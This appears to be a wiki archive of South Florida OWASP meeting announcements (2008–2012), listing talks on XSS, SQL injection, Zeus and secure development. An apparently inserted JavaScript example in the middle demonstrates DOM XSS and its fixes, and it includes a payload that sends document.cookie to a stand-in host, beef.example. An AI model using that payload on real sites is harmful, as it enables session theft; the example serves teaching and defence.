Wednesday, April 25, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our February meeting where, in line with our previous announcement, we will have two great talks. Please note that food and drink after the meeting will also be sponsored by DBNetworks and OWASP.

Talk 1: How is static analysis like hunting foxes in the forest?

A brief guide to tool-assisted secure code review, including a discussion of challenges and recommendations to make your work in static analysis and secure code review more effective.

Presenter Bio: Sean Matthiesen is a Senior Consultant at Cigital, Inc. His expertise is in software development, secure code review, and static code analysis. Sean has provided consulting services to several large commercial clients and has been involved in the development of many mission critical software applications. Over the last 22 years, he has worked as a developer in multiple programming languages, including C++ and Java.

Prior to joining Cigital, Inc., Sean built and managed the static analysis team at a Fortune 500 company, where he was responsible for all aspects of secure software development including security awareness training, static analysis tool support, secure code review, security architecture review, and software security audits. He has trained over 500 developers on Secure Application Development using IBM Rational AppScan Source and 250 developers on secure software development, and has contributed to multiple online CBT courses. Sean has over 5 years of hands-on experience using the Ounce/AppScan Source product. He holds a B.S. in Computer Science from Principia College.

Talk 2: SQL Injection

New reports of SQL injection attacks on corporate databases are appearing almost weekly. Applications free from vulnerabilities are always the best defense, but a better backstop is clearly needed, since existing solutions are unable to defend against this threat. DBNetworks will present its vision for a future technology that will protect against new and unique SQL injection attacks in real time.

Presenter Bio: Prior to coming on board at DBNetworks as the Director of Systems Engineering, Stuart Hancock was the Enterprise Cloud Program Manager at Cisco Systems; prior to that, he held positions at Cisco as a consulting engineer and HPC architect, and has worked in the past for a number of startups, as well as EMC, IPivot (acquired by Intel for $500M), Intel, and Wang Laboratories.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1124, 3301 College Ave, Fort Lauderdale, FL 33314-7796


'''Thursday, February 23, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after'''

Join us for our February meeting where in alignment with our previous announcement, we will have two great talks. Please note that food and drink after the meeting will also be sponsored by WhiteHat.

Talk 1: Future of Cross Site Scripting defenses

This talk will discuss the past methods used for cross-site scripting (XSS) defense that were only partially effective. Learning from these lessons, we will also discuss present-day defensive methodologies that are effective but place an undue burden on the developer. We will then finish with a discussion of future XSS defense methodologies that shift the burden of XSS defense from the developer to various frameworks. These include auto-escaping template technologies, browser-based defenses such as Content Security Policy, and JavaScript sandboxes such as the Google CAJA project and JSReg.

Presenter Bio: Jim Manico is the VP of Security Architecture for WhiteHat Security, a web security firm. Jim is a participant and project manager of the OWASP Developer Cheatsheet series. He is also the producer and host of the OWASP Podcast Series.

[[Media:OWASP_April_2012.pdf]]

Talk 2: Holiday Downtime, It wasn't just you!

During the holiday season, two researchers in Germany introduced the world to a severe denial of service attack at the 28th Chaos Computer Congress in Berlin on December 28, 2011. This vulnerability affects most web application platforms, including ASP.NET, Java, and PHP, to name a few. In this presentation, Chris will discuss and demo a working proof of concept of this DoS attack.

Presenter Bio: Christopher Zavala is a native of South Florida and is currently a Web App Pen Tester for Citigroup. A graduate of FIU who has been an employee of everything from small businesses to large corporations, he is very diverse in both his technical and business mindset.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1124, 3301 College Ave, Fort Lauderdale, FL 33314-7796


'''Tuesday, November 29, 2011 - 6:00pm - South Florida OWASP Meeting - Introduction to Mobile Challenges and Procedures'''

Join us for our November meeting where Brent Williams and Michael Patterson will present on Introduction to Mobile Challenges and Procedures: Reversing Android, iOS, Blackberry.

Presenter Bio:

Brent Williams is currently CTO at Equifax/Anakam Identity. In the past he has worked in business development for Homeland Security at SRA International. He obtained his degree from Johns Hopkins University.

Michael Patterson is the Founder of InAuth, Inc., a company that offers next-generation solutions for mobile device security. He is the author of 18 provisional patents related to mobile authentication and fraud detection. He founded SMobile, Inc., which was sold to Juniper in 2010.

[[Media:OWASP_mobile_Nov_2011.pdf]]

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1124, 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682)


'''Wed. September 28, 2011 - 6:00pm - South Florida OWASP Meeting - Secure Application Development'''

Join us for our September meeting where Rohini Sulatycki will present on Secure Application Development. The talk will cover the following topics.

* Current Landscape
* Why do security vulnerabilities occur?
* Design
* Design Patterns
* Threat Modeling
* Development
* OWASP Top 10
* Testing
* Penetration Testing
* Configuration
* Maintenance

Presenter Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, Incident Response, and Payment Application testing for Trustwave's clients. Rohini has been involved in the Information Technology industry for more than 15 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application tests in her capacity at Trustwave. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA). She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC on topics such as Web application security, Ajax security concerns and Flash application security. 

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1124, 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682)

'''Wed. Aug 31, 2011 - 6:00pm - South Florida OWASP Meeting - Blackhat/ Defcon Recap - All you wanted to know and everything you missed'''

Join us for our August meeting where we will be discussing the latest news, tools and other hacking techniques displayed at Blackhat/ Defcon conferences this year.

If you were unable to make the cons this year, this is a good way to catch up on the most important talks. If you had trouble getting in to a talk or were still nursing that hangover and missed your favorite presentation, this will catch you up. This will also be a good time to reminisce about the Defcon Open CTF and the cons in general.

Presenter Bio:

Claudio Lacayo is a local security researcher currently involved in the financial industry.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1048-1049, 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682). 6pm


'''Wed. July 27, 2011 - 6:00pm - South Florida OWASP Meeting - Double Feature - SQLMap 0.9 Overview and Analysis + Automated Scanning and Differential Reporting'''

Join us for our July meeting, where we will be discussing the latest release of one of the most formidable web application attack tools currently available: SQLMap 0.9.

The meeting will discuss some basic methods of SQL injection vulnerability identification (both error-based and blind), and will go over ways to use the SQLMap 0.9 tool to test your web application. Furthermore, we will discuss some of the more advanced features of SQLMap that were unavailable in previous releases.

Presenter Bio: Alexander Heid is a local security researcher, board member of HackMiami and co-chair of South Florida OWASP. Heid is also employed within the financial industry as a web application vulnerability analyst.

Automated Scanning and Differential Reporting

Companies are struggling with scaling source code scanning; there are not enough security experts to fulfill the current demand. Developers are being overwhelmed with the quantity and quality of issues reported from misconfigured scanning tools. This session will present an automated source code scanning deployment methodology that allows organizations to automatically reduce false positives during scanning and deliver reports that represent the high-confidence security risk of the latest software changes.

What will your audience walk away with?

1) Establishing security policies is key to reducing false positives
2) Automated scanning is easy to configure and requires limited maintenance
3) Differential reporting reduces developer overload by highlighting the risk of recent changes

Presenter Bio:

Bruce Mayhew is a Security Solutions Architect at IBM. Bruce has over 20 years of software development experience with the last 13 years focused on application security. At IBM, he is frequently a project lead for application security assessments. Bruce has created an application security practice and training curriculum for large financial institutions and has been a Web Application Security Course instructor for the SANS Institute. Bruce is on the SANS Council for Secure Java Programming and is an author of the SANS GSSP Secure Programming Assessment. He is the primary author of WebGoat and was instrumental in bringing WebGoat to OWASP and currently leads the OWASP WebGoat project. A frequent speaker on application security topics, Bruce has presented at OWASP, NASA, ISSA, NSA, Innovate and many commercial and financial institutions.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1124, 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682). 6pm


'''Thurs. March 17, 2011 - 3:30pm - South Florida OWASP Meeting + ISSA Meeting'''

South Florida OWASP is teaming up with South Florida ISSA to bring you a very special St. Patrick's Day meeting. There will be an after-party sponsored by Barracuda in Boca. We will have two great talks: Edward Bonver from Symantec will speak on Threat Modeling, followed by Grant Murphy from Barracuda presenting their latest research, The State of Web Application Security. This meeting will be held from 3:30pm - 5:30pm at NCCI Holdings, Inc. in Boca Raton, and the party, sponsored by Barracuda, will be at the Dubliner.

Meeting: NCCI Holdings, 901 Peninsula Corporate Cir, Boca Raton, FL 33487-1362

After-party: Dubliner, 435 Plaza Real, Boca Raton, FL

Talk: Threat Modeling

Threat Modeling is one of the most important security activities that a development/QA team needs to perform as part of a Security Development Lifecycle. This activity allows the team to build a complete security profile of the system being built. Threat Modeling is not always easy to get going for a team that has little or no security experience. In this presentation we'll take a look at why Threat Modeling is so important; we'll explore the process behind it, and how the process is being implemented and followed across Symantec.

Bio: Edward Bonver - Software Engineer, Symantec

Edward Bonver is a principal software engineer on the product security team under the Office of the CTO at Symantec Corporation. In this capacity, Edward is responsible for working with software developers and quality assurance (QA) professionals across Symantec to continuously enhance the company's software security practices through the adoption of methodologies, procedures and tools for secure coding and security testing. Within Symantec, Edward teaches secure coding and security testing classes for Symantec engineers, and also leads the company's QA Security Task Force, which he founded. Prior to joining Symantec, Edward held software engineering and QA roles at Digital Equipment Corporation, Nbase and Zuma Networks. Edward is a Certified Information Systems Security Professional (CISSP) and a Certified Secure Software Lifecycle Professional (CSSLP). He holds a master's degree in computer science from California State University, Northridge, and a bachelor's degree in computer science from Rochester Institute of Technology. Edward is a Ph.D. student at NOVA Southeastern University.

Talk: The State of Web Application Security

It's no secret that more and more commerce is being conducted via Web applications. Web-based applications are convenient for consumers and allow vendors to get applications online quickly to reach those consumers. This trend has also created a variety of privacy and security concerns that affect all companies transacting business over the Web. Recently, Barracuda Networks co-sponsored a research study conducted by the Ponemon Institute titled "The State of Web Application Security" that revealed that these concerns are keenly felt by web application administrators. However, a major disconnect exists, as appropriate countermeasures to these threats are either ineffective or completely non-existent. Join us for an informative seminar to learn:

* More about our revealing research
* Why Web applications are under attack
* What hackers are doing to compromise Web applications
* How to mitigate this risk

Bio: Grant Murphy, Vice President of Enterprise Solutions, Barracuda Networks

Grant Murphy is Vice President of Enterprise Solutions, managing worldwide sales for the Barracuda Web Application Firewall and the Web Filtering products at Barracuda Networks. Murphy brings significant experience in the Web proxy/cache market and in how these technologies can be used to secure employees' Internet access as well as the sites they are accessing. He has been a frequent speaker at many security industry events worldwide over the past four years. Prior to joining Barracuda, he was responsible for sales of McAfee's Web and Email filtering products. Murphy earned his CISSP accreditation in March of 2006.

Pre-Registration: Seating is limited, so you must pre-register for the event.

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an ISSA Meeting? If you are a CISSP and you provide your CISSP number at registration, we will submit your CPE credits automatically for you.

'''Wed. February 23, 2011 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1124, 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682). 6pm

Talk: Building a Web Application Attack Framework

Miguel Turner will be discussing the challenges involved in building a tool to support vulnerability analysts with the automated detection and exploitation of Web application vulnerabilities.

Bio: Miguel Turner currently works for Immunity as a developer, and has worked internationally on a number of endeavors. His current focus and research is on automatic exploitation of Web applications.

'''Wed. December 1, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 3032/3034, 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682). 6pm

Talk: Attacking web applications via XSS with BeEF and Metasploit

Join us as Rod Soto presents a method of gaining administrative access to a domain controller through the exploitation of a DOM XSS vulnerability in a web application. The talk serves to demonstrate the risks that are posed through client-side exploitation.

Bio: Rod Soto is a vulnerability analyst and local security researcher. He is also a consultant to businesses around the globe regarding enterprise security matters.

'''Wed. October 6, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm Abstract: Improving application security with ESAPI Swingset The primary aim of the OWASP Top 10 is to educate developers, designers, architects and organisations about the consequences of the most important web application security weaknesses. ESAPI is Enterprise security API's for remediation of OWASP Top 10 vulnerabilities. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI Swingset is a web application which demonstrates common security vulnerabilities and asks users to secure the application against these vulnerabilities using the ESAPI libraries. The application is intended for Java Developers. The goal of the application is to teach developers about the functionality of the ESAPI libraries and give users a practical understanding of how it can be used to protect web applications against common security vulnerabilities. Bio: Fabio is currently working as an Information Security Specialist at AIB Bank (Dublin, Ireland). His tasks include performing risk analysis, assessing the security of web applications developed internally or purchased from third parties, define policies and standards on secure coding, as well as providing training on web application security to developers, auditors, executives and security professionals. Prior to joining AIB, he worked as a Security Engineer at Symantec Security Response European Headquarters analyzing malicious code, blended threats, security risks and vulnerabilities in various applications. Before moving to Ireland, he worked in the development of different training programs and activities with emphasis on secure software development in his native Argentina. 
<br As a member of the OWASP organization, Fabio is part of Global Education Committee whose mission is to provide training and educational services to businesses, governments and educational institutions on application security, he coordinates international conferences around this topic, and since early 2010 has been appointed chairman of OWASP Chapter in Ireland. Fabio is a graduate in Computer Engineering from the Universidad Católica Argentina and has been granted the CISSP by (ISC) 2 back in 2006.
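The client-side pattern that both talks above turn on, the DOM XSS sink that Rod Soto's talk exploits and the input validation and output encoding that ESAPI's validator and encoder apply, as an added JavaScript example. This is not code from either talk, from BeEF, from Metasploit or from ESAPI. The URL fragment, the `name` parameter and the `beef.example` hook host are constructed for the example, and the `innerHTML` sink is modelled as string concatenation so the code runs under Node without a browser DOM.

```javascript
// Added illustration (not from the talks, BeEF, Metasploit or ESAPI) of a
// DOM-based XSS: untrusted data flows from a DOM source (location.hash)
// into an HTML sink (innerHTML) without encoding, followed by the fix.
// The sink is modelled as string concatenation so this runs under Node.

// Constructed attacker URL fragment. The handler mimics a BeEF-style hook:
// it sends the session cookie to an attacker host (hypothetical name).
const attackerFragment =
  '#name=<img src=x onerror="new Image().src=\'http://beef.example/hook?c=\'+document.cookie">';

// Source: read the `name` parameter out of the fragment, as a naive page would.
function nameFromFragment(fragment) {
  const m = /[#&]name=([^&]*)/.exec(fragment);
  return m ? decodeURIComponent(m[1]) : '';
}

// Vulnerable sink: equivalent to  el.innerHTML = '<h1>Welcome ' + name + '</h1>'.
// The browser parses the attacker's <img> and fires its onerror handler.
function renderUnsafe(fragment) {
  return '<h1>Welcome ' + nameFromFragment(fragment) + '</h1>';
}

// Fix 1: HTML-entity encode anything that reaches an HTML context
// (the job ESAPI's encoder.encodeForHTML does in Java). In a real page,
// assigning to textContent instead of innerHTML achieves the same effect.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Encoding alone: the payload is displayed as inert text.
function renderEncoded(fragment) {
  return '<h1>Welcome ' + escapeHtml(nameFromFragment(fragment)) + '</h1>';
}

// Fix 2: allowlist validation of the value before use (ESAPI's
// validator.getValidInput does the same job with a configured regex).
// Returns null when the value does not match the allowed shape of a name.
const NAME_PATTERN = /^[A-Za-z][A-Za-z .'-]{0,39}$/;
function validName(value) {
  return NAME_PATTERN.test(value) ? value : null;
}

// Hardened renderer: validate, fall back to a neutral value, then encode.
// Both layers are kept because the allowlist may later be loosened.
function renderSafe(fragment) {
  const name = validName(nameFromFragment(fragment)) || 'guest';
  return '<h1>Welcome ' + escapeHtml(name) + '</h1>';
}

// Triage helper for a test suite: does the rendered markup contain a tag
// the page did not intend? Strips the fixed wrapper, then looks for a
// '<' that starts a tag. Encoded output contains no '<' at all.
function hasInjectedTag(html) {
  const inner = html.replace(/^<h1>Welcome /, '').replace(/<\/h1>$/, '');
  return /<[A-Za-z!\/]/.test(inner);
}

// Stand-alone run: compare the renderers on a benign value and the payload.
if (typeof require !== 'undefined' && require.main === module) {
  for (const frag of ['#name=Alice', attackerFragment]) {
    console.log('unsafe :', renderUnsafe(frag), '| injected:', hasInjectedTag(renderUnsafe(frag)));
    console.log('encoded:', renderEncoded(frag), '| injected:', hasInjectedTag(renderEncoded(frag)));
    console.log('safe   :', renderSafe(frag), '| injected:', hasInjectedTag(renderSafe(frag)));
  }
}
```

The point of the example is that the vulnerability is entirely client-side: no request with the payload ever reaches the server, so server-side filters and logs never see it, which is why the fix has to live in the page's own handling of `location.hash` and similar DOM sources. The cookie exfiltration in the constructed payload stands in for the hook that a framework such as BeEF would plant to keep control of the victim's browser.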

'''Wed. August 25, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is entitled "PCI Fundamentals." The talk will discuss the PCI compliance process, requirements, and implementations for everything from networks to web applications. The talk will be presented by Ivan Moskowitz.

Presenter Bios:

Ivan Moskowitz is a local security researcher and compliance auditor at a Fortune 100 firm.

'''Wed. July 28, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is entitled "Citrix Vulnerabilities." The talk will discuss the architecture of a Citrix server, as well as the vulnerabilities that exist within various configuration settings. The talk will be presented by Adam Cazzolla and Dickson Kwong.

Presenter Bios:

Adam Cazzolla and Dickson Kwong are local security researchers and web application vulnerability analysts at a Fortune 20 firm.

'''Wed. June 23, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "Defensive Web Application Development" and "Modern Digital Crime Tools and Techniques"

This next OWASP meeting will feature two talks that are scheduled to be presented at the upcoming 2600 Hackers On Planet Earth conference (http://www.hope.net) in New York City. We will be featuring a sneak-peek preview of these talks on June 23, 2010 at the Nova campus.

"Defensive Web Application Development" by Pete Greko and Fabian Rothschild

This talk will examine various methods of code obfuscation for web application development. The goal is to make the tracking of covertly logged data too difficult for the average attacker to bother with.

"Modern Digital Crime Tools and Techniques" by Alexander Heid

This talk will examine the latest developments in tools and trends within the world of digital crime. It will cover updates, developments, and plugins for new Zeus trojan variants, and will also examine new versions of various exploit kits used to distribute malicious payloads. An overview of the digital crime lifecycle will be discussed as well.

Presenter Bios:

Pete Greko - is a local security researcher and board member of HackMiami. Greko is employed within the financial industry as a web application vulnerability analyst.

Alexander Heid - is a local security researcher, board member of HackMiami and co-chair of South Florida OWASP. Heid is also employed within the financial industry as a web application vulnerability analyst.

Fabian Rothschild - is a local security researcher and member of HackMiami. Rothschild is employed as a security consultant for various clients around South Florida.

'''Wed. May 26, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 3032/3034 located on the 3rd floor, Eastside of the Carl DeSantis Building 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "PCI Compliance Fundamentals" by Georgios Mortakis of Enterprise Risk Management, Inc.

The presentation will go over application development to ensure PCI compliance, specifically developing applications to defeat the use of magnetic stripe skimmers. There will be live demonstrations taking place with a magnetic stripe skimmer showing ways to defeat the interception of important data.

Presenter Bio:

Georgios Mortakis (CISSP, CISA, QSA) is a Director of Information Systems Security with Enterprise Risk Management, Inc. Enterprise Risk Management, Inc., founded in Miami, FL in 1998, offers a wide variety of information security and information systems audit services to local, national (Fortune 500) and international businesses. [[Media:South_Florida_OWASP_May_2010_Card_Skimming_Demo.pdf]]

'''Wed. April 28th, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 3049/3051 located on the 3rd floor, Eastside of the Carl DeSantis Building 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "Cisco ACE Web Application Firewall Use Cases" by Rob Kinnion and Vikas Deolaliker.

The presentation will give an overview of the WAF market, real-world deployments and customer concerns, which will help OWASP evolve the WAF as a product category. This event will also be available via a live WebEx feed. Details are below.

Presenter Bios:

Rob Kinnon has been a Systems Engineer at Cisco for 10 years. He has held the coveted CCIE since many years before most people had even heard of it. He is one of the most highly respected and formidable Cisco Security engineers within the region. Rob specializes in Cisco Security Architecture in NAC, Intrusion Prevention, Security Monitoring, and Log Correlation, to name a few. Rob has helped countless organizations protect and secure their networks.

Vikas Deolaliker is a Product Manager in DCASBU at Cisco for Cisco WAF. He has helped define and product manage a broad spectrum of products for the datacenter including: SOA Appliances, SAN Director Class Switches, Grid Computing Middleware, Java Enterprise Software.

WebEx Live Session Information:

Meeting Number: 201 076 756

Meeting Password: Cisco

To start this meeting

1. Go to https://cisco.webex.com/cisco/j.php?S=201076756
2. Log in to your account.
3. Click "Start Now".
4. Follow the instructions that appear on your screen.

ALERT: Toll-Free Dial Restrictions for (408) and (919) Area Codes

The affected toll free numbers are: (866) 432-9903 for the San Jose/Milpitas area and (866) 349-3520 for the RTP area. Please dial the local access number for your area from the list below:

- San Jose/Milpitas (408) area: 525-6800
- RTP (919) area: 392-3330

To join the teleconference only

1. Dial into Cisco WebEx (view all Global Access Numbers at http://cisco.com/en/US/about/doing_business/conferencing/index.html)
2. Follow the prompts to enter the Meeting Number (listed above) or Access Code followed by the # sign.

San Jose, CA: +1.408.525.6800
RTP: +1.919.392.3330
US/Canada: +1.866.432.9903
United Kingdom: +44.20.8824.0117
India: +91.80.4350.1111
Germany: +49.619.6773.9002
Japan: +81.3.5763.9394
China: +86.10.8515.5666

http://www.webex.com

IMPORTANT NOTICE: This WebEx service includes a feature that allows audio and any documents and other materials exchanged or viewed during the session to be recorded. By joining this session, you automatically consent to such recordings. If you do not consent to the recording, do not join the session.

'''Wed. March 31st, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Knight Lecture Hall - Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "Adon't be an Adobe victim: An overview of how recent Adobe-related flaws affect your web application" by Josh Stabiner.

The talk will examine the threats posed by PDF and Flash vulnerabilities to web applications and their users, and will examine ways to mitigate the potential threats to your organization.

Presenter Bio:

Josh Stabiner is a manager in Ernst & Young's Advanced Security Center specializing in attack and penetration advisory services. He manages and executes assessments of web applications, external, internal and wireless networks, as well as physical security and social engineering. [[Media:South_Florida_OWASP_Adobe_ASC_Demo.pdf]]

'''Wed. Jan 27th, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Knight Lecture Hall, Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) This meeting's presentation is "Zeus & You: Analysis of the underground's most popular trojan" by Alexander Heid and Fabian Rothschild. [[Media:OWASP_miami_Zeus_and_You_01-2010.pdf]]

'''Wed. Oct. 7th, 2009 6PM - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus 2nd Floor - Room 2071 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) This meeting's presentation is by Gary Bahadur and will be based on the presentation he is giving at Hacker Halted on the topic of Supplier Risk Management with more of a web focus.

'''Thu. Aug 20th, 2009 3:30PM - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus 1st Floor - Room 1048/1049 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) This meeting's presentation is "Security in .NET Applications & Integrating Security in the Software Development Lifecycle" by Jon Arce. This is a joint meeting that has been arranged graciously by the local ISSA chapter (www.sfissa.org). [[Media:OWASP_miami_Integrating_Security_in_App_Dev_v1_1-2009_08.pptx]] [[Media:OWASP_miami_App_Security_Using_dotNET_Framework_v1_0-2009_08.pptx]]

'''Tue. June 30th, 2009 6:00PM - South Florida OWASP Meeting'''

Facility Location: Mission Critical Systems, Inc. 1347 East Sample Road, Suite 3 Pompano Beach, Fl 33064 Phone: (954) 788-7110 This meeting's presentation is "Risk Rating Models for Vulnerabilities" by Rishikesh Pande. [[Media:OWASP_miami_Risk_Modeling_v2-2009_06.pdf]]

'''Fri. April 3rd, 2009 6:00PM - South Florida OWASP Meeting'''

Facility Location: Immunity, Inc. 1247 Alton Road Miami Beach, FL 33139 Phone: (212) 534-0857 This meeting's presentation is "Memory Corruption and Buffer Overflows" by Dave Aitel. Dave presented on this topic during the OWASP NYC AppSec 2008 Conference. The presentation will also include some web application content based on Immunity's recent project experiences. [[Media:OWASP_miami_Corruption-2009_04.pdf]]

'''Wed. February 4th, 2009 5:00PM - South Florida OWASP Meeting'''

Facility Location: Mission Critical Systems, Inc. 1347 East Sample Road, Suite 3 Pompano Beach, Fl 33064 Phone: (954) 788-7110 This meeting's presentation is "An Architect's view of Application Security" by Rick Carlin. [[Media:OWASP_miami_Architect%E2%80%99s_View_of_Application_Security-2009_02.ppt]]

'''Wed. December 3rd, 2008 5:00PM - South Florida OWASP Meeting'''

Facility Location: Mission Critical Systems, Inc. 1347 East Sample Road, Suite 3 Pompano Beach, Fl 33064 Phone: (954) 788-7110 This meeting's presentation is a live web hacking demo by Dan Carcone.